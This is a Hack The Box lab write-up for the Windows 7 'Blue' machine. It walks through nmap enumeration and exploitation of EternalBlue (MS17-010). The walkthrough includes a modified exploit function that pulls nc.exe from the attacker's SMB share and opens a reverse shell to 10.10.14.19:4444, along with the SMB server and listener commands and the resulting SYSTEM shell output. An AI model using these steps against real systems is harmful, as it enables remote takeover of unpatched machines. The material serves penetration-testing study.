# Blue

![](/files/KYBbVhkvz3TUaeMkkAOT)

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.40 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

```
# Nmap 7.92 scan initiated Thu Mar 24 22:03:58 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).
Not shown: 61407 closed tcp ports (reset), 4119 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

# Nmap done at Thu Mar 24 22:04:28 2022 -- 1 IP address (1 host up) scanned in 30.58 seconds
```

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p135,139,445,49152,49153,49154,49155,49156,49157 10.10.10.40 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Thu Mar 24 22:05:28 2022 as: nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 -oN targeted 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.076s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-03-24T21:17:43
|_  start_date: 2022-03-24T21:13:36
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-03-24T21:17:44+00:00
|_clock-skew: mean: 11m11s, deviation: 1s, median: 11m10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 24 22:06:41 2022 -- 1 IP address (1 host up) scanned in 73.06 seconds
```

The machine has the `Windows 7 Professional` operative system, and the SMB service open, and it allows guest authentication. Let's try to enumerate the SMB service a bit more with nmap by applying a series of scripts from the `vuln` and `safe` categories.

> nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40

* `--script` Runs a script scan script **categories**.
* `-p` scan the specific **port**.
* `-oN` **save** the scan result into file, in this case the *smbScan* file.

```
# Nmap 7.92 scan initiated Thu Mar 24 22:22:24 2022 as: nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.054s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

# Nmap done at Thu Mar 24 22:22:28 2022 -- 1 IP address (1 host up) scanned in 4.01 seconds
```

It looks like the machine is vulnerable to the *EternalBlue (MS17-010)* exploit.

{% hint style="info" %}
**EternalBlue** allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server.
{% endhint %}

## Exploitation

Let's clone the following [GitHub repository](https://github.com/worawit/MS17-010), which will allow us to exploit the *EternalBlue* exploit.

> git clone <https://github.com/worawit/MS17-010>

First, we'll have to check it the machine is really vulnerable to the *EternalBlue* exploit. First edit the `checker.py` file and add the `guest` username.

> nano MS17-010/checker.py

```python
USERNAME = 'guest'
PASSWORD = ''
```

Now execute it with *Python2*.

> python2 MS17-010/checker.py 10.10.10.40

```
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
```

The machine is vulnerable to the *EternalBlue* exploit through various pipe names. Now let's edit the `zzz_exploit.py` script and add the guest username again.

> nano MS17-010/zzz\_exploit.py

```python
USERNAME = 'guest'
PASSWORD = ''
```

Now let's find for the `cmd` word, and change the `smb_pwn` function, so it will send us a reverse shell.

```python
def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
#	print('creating file c:\\pwned.txt on the target')
#	tid2 = smbConn.connectTree('C$')
#	fid2 = smbConn.createFile(tid2, '/pwned.txt')
#	smbConn.closeFile(tid2, fid2)
#	smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	service_exec(conn, r'cmd /c \\10.10.14.19\smbFolder\nc.exe -e cmd 10.10.14.19 4444')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."
```

The command will grab the `nc.exe` from a shared folder to send us the reverse shell. So let's set an *SMB* server with *impacket* on the folder in which we have the `nc.exe` binary.

> ls -l

```
-rw-r--r--  1 root    root      28160 Feb 15 19:35 nc.exe
```

> impacket-smbserver smbFolder $(pwd) -smb2support

```
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

Before executing the script, let's set a *netcat* listener on port *4444*.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Finally, if we execute the `zzz_exploit.py` script indicating the IP address and the `samr` pipe name, it will grab the `nc.exe` binary from our shared folder to send us a reverse shell, and then all we have to do is reap the harvest and take both the user and the root flag.

> python2 MS17-010/zzz\_exploit.py 10.10.10.40 samr

```
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49163
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

whoami
nt authority\system

type \users\haris\desktop\user.txt
a221bdab893a8249c8675bbf895d78de

type \users\administrator\desktop\root.txt
c5046883c3b47ea2a7f62919ca45e59d
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/blue.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.